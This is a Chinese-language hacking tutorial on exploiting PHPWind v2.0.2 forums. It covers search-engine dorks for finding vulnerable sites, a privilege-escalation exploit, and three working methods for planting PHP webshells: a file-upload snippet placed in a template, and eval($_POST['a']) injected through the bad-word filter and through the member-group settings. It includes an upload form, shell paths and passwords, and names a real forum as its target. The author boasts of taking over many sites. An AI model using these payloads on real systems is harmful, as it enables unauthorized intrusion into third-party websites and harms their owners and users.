phpwind漏洞利用終結篇

這漏洞出了也有段時間了..開始在Q裡..三少哥哥先發了漏洞利用工具給我..然後自己試著傳上了PHP馬..然後楓三少又告訴我一種方法...拿下了不少站...當晚准備把文章趕寫出來..太困了就沒繼續寫...這幾天家裡發生的事太多..一直也沒時間寫...最近網上也出了文章和教程,我看了下都不是很完整..今天我就來做個完結篇的..算是慶祝我升黑基管理員把....

首先在baidu或google搜索Powered by PHPWind v2.0.2 或Powered by PHPWind v2.0.2, PLUS V2.1

為了不耽誤大家時間..我提前找了一個
http://www.arebbs.com/先注冊一個...注冊過程我想大家都會的把..。我已經注冊好了..登陸.
然後用玄貓寫的phpwind提升漏洞測試程序提權.
提示失敗..但也不要灰心...我們來看下..看..多出了一個"系統設置 "
我在測試的時候.發現好幾個站都是這樣,.但結果都是成功的...下面我們繼續拿webshell
將介紹三種方法給大家

請將此文件(template/baobao/header.htm)屬性設置為 777 可寫模式
汗了...好象管理員發現了..把這個設置了不可寫...
大家可以找別的站試下...把方法說下
方法一.
進入後台，找到“風格模板設置”
在原有的代碼前面加入以下代碼：
<style type='text/css'>
</style>
<!--
EOT;
?>-->
<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
<!--
<?php
print <<<EOT
-->

保存後，木馬地址為當前目錄下的faq.php

在本機用如下表單進行提交：
<form ENCTYPE="multipart/form-data" ACTION="http://目標服務器/faq.php"
METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
上傳成功後的木馬存在論壇目錄下
直接訪問就行！

假設現在的這個是可以的...
這個是我以前搞的..我試下還能用不..看樣是不行了..大家只要把這裡換一下..然後就可以本地上傳任意文件了..前提是次目錄是可寫的...如果不可寫..我們還可以利用第二種方法..

方法二.

首先用EXP進入後台,在後台裡執行如下過程:
新增 不良詞語寫 a']='aa';eval($_POST['a']);// 替換為那裡可以寫隨便寫..我這裡替換了11
而後得到一個shell地址為 http://www.arebbs.com/data/bbscache/wordsfb.php
寫如成功後wordsfb.php文件的代碼就成了

<?php
$wordsfb['a']='aa';eval($_POST['a']);//']='1';
?>

然後用lanker微型PHP後門客戶2.0正式版.htm上傳一個新PHP馬...密碼是a
這樣我們就得到webshell了...

本程序目錄..我們來傳個馬看下.hb.php是angel寫的PHP馬...出現OK就是上傳成功...我們訪問下看看
http://www.arebbs.com/data/bbscache/hb.php
密碼www.ciker.org登陸/....就這麼簡單...:)

下面還有一個方法是在網上看到的..也介紹下把..

方法三.
用戶等級管理
然後新建立會員組
頭銜你可以隨便寫，但是千萬不要寫單雙引號特殊符號，升級圖片號寫a';eval($_POST['a']);//
升級點數依然可以隨意寫。

而後得到一個shell地址為
http://localhost/bbs/data/bbscache/level.php
密碼是a lanker的一句話後門。

接下來的就跟方法二要做的一樣了..

我們試下有沒成功.密碼同樣是a
暈...
難道被發現了?
估計是封了我IP
webshell可以訪問...看樣是把我IP封了..剛才試的時候...出了錯誤..

感覺是
升級圖片號寫a';eval($_POST['a']);//
這句問題.如果大家在測試時候也出現和我同樣的錯誤
把a';eval($_POST['a']);//這個改為
a']='aa';eval($_POST['a']);//...我就不費時間去找別的站測試了...如果大家有好的發現歡迎與我交流